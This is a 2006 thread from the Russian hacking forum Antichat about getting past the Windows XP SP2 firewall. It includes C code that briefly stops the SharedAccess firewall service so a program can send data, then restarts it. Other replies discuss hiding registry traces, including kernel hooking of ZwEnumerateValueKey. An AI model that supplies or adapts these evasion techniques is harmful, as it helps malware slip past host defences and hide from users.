ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > С/С++, C#, Delphi, .NET, Asm
Перезагрузить страницу Обход Xp Sp2 фаервола
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Обход Xp Sp2 фаервола
  #1  
Старый 02.04.2006, 04:13
Аватар для KEZ
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию Обход Xp Sp2 фаервола
идите на***
Последний раз редактировалось KEZ; 19.04.2006 в 13:25..
 
Ответить с цитированием

  #2  
Старый 02.04.2006, 11:30
Аватар для ac005
ac005
Banned
Регистрация: 09.02.2006
Сообщений: 5
Провел на форуме:
37370

Репутация: -5
По умолчанию
4e mne s etom delati?
 
Ответить с цитированием

  #3  
Старый 02.04.2006, 11:32
Аватар для Fashion
Fashion
Познающий
Регистрация: 31.03.2006
Сообщений: 48
Провел на форуме:
37237

Репутация: 6
По умолчанию
и что с этим делать, подскажи?
 
Ответить с цитированием

  #4  
Старый 02.04.2006, 12:06
Аватар для drmist
drmist
Green member - Level 3
Регистрация: 08.10.2005
Сообщений: 396
Провел на форуме:
400609

Репутация: 239
По умолчанию
Я для начала попробывал бы откомпилировать в MS Visual C++ 6.0
Вдруг повезет?
__________________
Никому нельзя верить...
 
Ответить с цитированием

  #5  
Старый 02.04.2006, 14:23
Аватар для Deem3n®
Deem3n®
Постоянный
Регистрация: 19.09.2005
Сообщений: 408
Провел на форуме:
3730496

Репутация: 519
По умолчанию
код прописывает прогу в список разрешенных файрволом, т.е оставляет "следы":


А что если воспользоватся более "грубым" способом?
Код:
#include <winsvc.h>
// ...
bool BypassFirewall()
{
	SC_HANDLE firewallService, scm;
	if(!(scm = OpenSCManager(0, 0,SC_MANAGER_ALL_ACCESS))) 
		return FALSE;
	// в ХР интернальное имя файрвола SharedAccess
	if (!(firewallService=OpenService(scm,"SharedAccess",SERVICE_ALL_ACCESS)))
	{
		CloseServiceHandle(scm);
		return FALSE;
	}
	
	// останавливаем сервис
	SERVICE_STATUS m_SERVICE_STATUS;
	ControlService(firewallService, SERVICE_CONTROL_STOP,&m_SERVICE_STATUS);

	// далее дожен быть ваш код
	// который работает в обход файрвола
	// ...
	// ...
	
         // запускаем заново сервис
	StartService(firewallService,0,NULL);

	CloseServiceHandle(firewallService);
	CloseServiceHandle(scm);
	return TRUE;
}
естессно эти методы рабочие в случае если прога запущена с привилегиями администратора т.к нужны права для временой остановки/запуска сервиса (записи в реестр значений - в 1м методе)
 
Ответить с цитированием

  #6  
Старый 02.04.2006, 15:42
Аватар для drmist
drmist
Green member - Level 3
Регистрация: 08.10.2005
Сообщений: 396
Провел на форуме:
400609

Репутация: 239
По умолчанию
Deem3n®
а втой способ следов не оставляет? ))
__________________
Никому нельзя верить...
 
Ответить с цитированием

  #7  
Старый 02.04.2006, 22:07
Аватар для qBiN
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме:
1535446

Репутация: 182


Отправить сообщение для qBiN с помощью ICQ
По умолчанию
Цитата:
Deem3n®
а втой способ следов не оставляет? ))
Угу))) незапустившегося сервиса чувак точно не заметит))
 
Ответить с цитированием

  #8  
Старый 02.04.2006, 22:57
Аватар для drmist
drmist
Green member - Level 3
Регистрация: 08.10.2005
Сообщений: 396
Провел на форуме:
400609

Репутация: 239
По умолчанию
Хм...
ну не знаю. я бы лишнюю запись в реестре наверно не заметил бы.
Правда и маздаевский фаер не юзал бы ))
Но все равно молодец.
__________________
Никому нельзя верить...
 
Ответить с цитированием

  #9  
Старый 03.04.2006, 09:49
Аватар для Deem3n®
Deem3n®
Постоянный
Регистрация: 19.09.2005
Сообщений: 408
Провел на форуме:
3730496

Репутация: 519
По умолчанию
Цитата:
Сообщение от qBiN  
Угу))) незапустившегося сервиса чувак точно не заметит))
Сервис будет перезапущен (если ты код смотрел),
а оставлять лишнюю запись в реестре имхо палено т.к в там и в правилах файрвола остается полный путь к экзешнику. Идеальным вариантом будет использование пары RegSetValueEx и RegDeleteKeyEx каждый раз когда данные должны посылаться в обход файрвола.

Цитата:
Сообщение от drmist  
а втой способ следов не оставляет?
->
Цитата:
А что если воспользоватся более "грубым" способом?
я же предложил грубую альтернативу, это что провокационный вопрос или желание попинать ногами?
 
Ответить с цитированием

  #10  
Старый 03.04.2006, 11:53
Аватар для KEZ
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию
Кстати, а ты пробовал этод метод? У меня ощущение что если фаервол выключен, новые приложения доступ к сети не имееют...
А если фаер был выключен? (DEMAND_START)
Тогда StopService() вернет ошибку, а StartService его запустит.

Цитата:
а оставлять лишнюю запись в реестре имхо палено т.к в там и в правилах файрвола остается полный путь к экзешнику.
one more time
... у меня перехватывается ZwEnumerateValueKey в ядре, поэтому можно скрыть любые ключи в реестре ...
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Новый обход фильтров форумов и и-мейлов используя атрибут style Dyb Авторские статьи 13 21.12.2007 20:55
КаббалкТелеком - скоростной интернет обход трафика... Allen Болталка 1 27.02.2006 02:17
Обход открытия нового окна Unicorn78 Чаты 1 23.01.2006 17:39
Windows xp sp2 down OwrLam Мировые новости 11 26.09.2004 18:38



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ